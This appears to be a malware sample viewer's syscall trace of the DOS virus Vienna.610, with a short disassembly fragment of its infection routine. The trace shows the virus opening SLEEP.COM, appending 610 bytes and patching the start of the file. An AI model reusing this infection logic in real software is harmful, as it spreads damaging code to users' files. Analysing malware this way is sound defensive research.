Sample viewer

vx.netlux.org/Virus.DOS.Vienna.610

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:49:25.61015326Z 48 PC: 12a71 | Get DOS version
2018-12-17T22:49:25.611285628Z 47 PC: 12a7d | Get disk transfer address
2018-12-17T22:49:25.613374723Z 26 PC: 12a8c | Set disk transfer address
2018-12-17T22:49:25.614720862Z 78 PC: 12b0d | Find first file
2018-12-17T22:49:25.619848916Z 67 PC: 12b45 | Get or set file attributes
2018-12-17T22:49:25.630810101Z 67 PC: 12b56 | Get or set file attributes
2018-12-17T22:49:25.655443392Z 61 PC: 12b60 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:49:25.663364925Z 87 PC: 12b6c | Get or set file date and time
2018-12-17T22:49:25.66629469Z 44 PC: 12b76 | Get time 0x12b76: and dh, 7
0x12b79: jmp 0x12b8a
0x12b7b: mov ah, 0x40
0x12b7d: mov cx, 5
0x12b80: mov dx, si
0x12b82: add dx, 0x8a
0x12b86: int 0x21
0x12b88: jmp 0x12beb
0x12b8a: mov ah, 0x3f
0x12b8c: mov cx, 3
0x12b8f: mov dx, 0xa
0x12b92: add dx, si
0x12b94: int 0x21
0x12b96: jb 0x12beb
0x12b98: cmp ax, 3
0x12b9b: jne 0x12beb
0x12b9d: mov ax, 0x4202
0x12ba0: mov cx, 0
0x12ba3: mov dx, 0
0x12ba6: int 0x21
2018-12-17T22:49:25.66982375Z 63 PC: 12b96 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:25.677286902Z 66 PC: 12ba8 | Move file pointer
2018-12-17T22:49:25.679406995Z 64 PC: 12bcb | Write file or device (Write 610 bytes on handle 5)
2018-12-17T22:49:25.689532529Z 66 PC: 12bdd | Move file pointer
2018-12-17T22:49:25.691436977Z 64 PC: 12beb | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:25.698895059Z 87 PC: 12bfe | Get or set file date and time
2018-12-17T22:49:25.704220415Z 62 PC: 12c02 | Close file
2018-12-17T22:49:25.713050235Z 67 PC: 12c0f | Get or set file attributes
2018-12-17T22:49:25.724481412Z 26 PC: 12c19 | Set disk transfer address
2018-12-17T22:49:25.729673607Z 0 PC: 12a57 | Program terminate